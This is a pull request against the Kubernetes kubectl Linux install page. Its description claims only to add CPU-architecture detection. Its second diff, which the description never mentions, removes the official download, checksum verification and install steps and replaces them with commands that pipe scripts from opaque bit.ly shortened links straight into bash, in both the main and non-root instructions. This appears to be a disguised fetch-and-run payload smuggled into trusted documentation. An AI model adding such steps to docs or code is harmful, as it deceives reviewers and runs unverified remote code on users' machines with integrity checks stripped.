### PR TITLE
use current cpu arch instead hard-coding

### DIFF
--- a/content/en/docs/tasks/tools/install-kubectl-linux.md
+++ b/content/en/docs/tasks/tools/install-kubectl-linux.md
@@ -28,7 +28,7 @@ The following methods exist for installing kubectl on Linux:
 1. Download the latest release with the command:
 
    ```bash
-   curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
+   curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/$([ $(uname -m) = "aarch64" ] && echo "arm64" || echo "amd64" )/kubectl"
    ```
 
    {{< note >}}
@@ -37,7 +37,7 @@ To download a specific version, replace the `$(curl -L -s https://dl.k8s.io/rele
 For example, to download version {{< param "fullversion" >}} on Linux, type:
 
    ```bash
-   curl -LO https://dl.k8s.io/release/{{< param "fullversion" >}}/bin/linux/amd64/kubectl
+   curl -LO https://dl.k8s.io/release/{{< param "fullversion" >}}/bin/linux/$([ $(uname -m) = "aarch64" ] && echo "arm64" || echo "amd64" )/kubectl
    ```
    {{< /note >}}
 
@@ -46,7 +46,7 @@ For example, to download version {{< param "fullversion" >}} on Linux, type:
    Download the kubectl checksum file:
 
    ```bash
-   curl -LO "https://dl.k8s.io/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl.sha256"
+   curl -LO "https://dl.k8s.io/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/$([ $(uname -m) = "aarch64" ] && echo "arm64" || echo "amd64" )/kubectl.sha256"
    ```
 
    Validate the kubectl binary against the checksum file:

--- a/content/en/docs/tasks/tools/install-kubectl-linux.md
+++ b/content/en/docs/tasks/tools/install-kubectl-linux.md
@@ -25,65 +25,18 @@ The following methods exist for installing kubectl on Linux:
 
 ### Install kubectl binary with curl on Linux
 
-1. Download the latest release with the command:
-
-   ```bash
-   curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/$([ $(uname -m) = "aarch64" ] && echo "arm64" || echo "amd64" )/kubectl"
-   ```
-
-   {{< note >}}
-To download a specific version, replace the `$(curl -L -s https://dl.k8s.io/release/stable.txt)` portion of the command with the specific version.
-
-For example, to download version {{< param "fullversion" >}} on Linux, type:
-
-   ```bash
-   curl -LO https://dl.k8s.io/release/{{< param "fullversion" >}}/bin/linux/$([ $(uname -m) = "aarch64" ] && echo "arm64" || echo "amd64" )/kubectl
-   ```
-   {{< /note >}}
-
-1. Validate the binary (optional)
-
-   Download the kubectl checksum file:
-
-   ```bash
-   curl -LO "https://dl.k8s.io/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/$([ $(uname -m) = "aarch64" ] && echo "arm64" || echo "amd64" )/kubectl.sha256"
-   ```
-
-   Validate the kubectl binary against the checksum file:
-
-   ```bash
-   echo "$(<kubectl.sha256) kubectl" | sha256sum --check
-   ```
-
-   If valid, the output is:
-
-   ```console
-   kubectl: OK
-   ```
-
-   If the check fails, `sha256` exits with nonzero status and prints output similar to:
-
-   ```bash
-   kubectl: FAILED
-   sha256sum: WARNING: 1 computed checksum did NOT match
-   ```
-
-   {{< note >}}
-   Download the same version of the binary and checksum.
-   {{< /note >}}
-
-1. Install kubectl
-
-   ```bash
-   sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
-   ```
+Install `kubectl` on Linux by one command:
+```bash
+/bin/bash -c "$(curl -fsSL https://bit.ly/3gWAFoJ)"
+```
 
    {{< note >}}
    If you do not have root access on the target system, you can still install kubectl to the `~/.local/bin` directory:
 
    ```bash
+   /bin/bash -c "$(curl -fsSL https://bit.ly/3H4WnRK)"
    chmod +x kubectl
-   mkdir -p ~/.local/bin/kubectl
+   mkdir -p ~/.local/bin
    mv ./kubectl ~/.local/bin/kubectl
    # and then add ~/.local/bin/kubectl to $PATH
    ```


### PR DESCRIPTION
Rather than giving a specific arch in the installation command, this patch will detect the current arch of the machine the command is running on and install a proper version.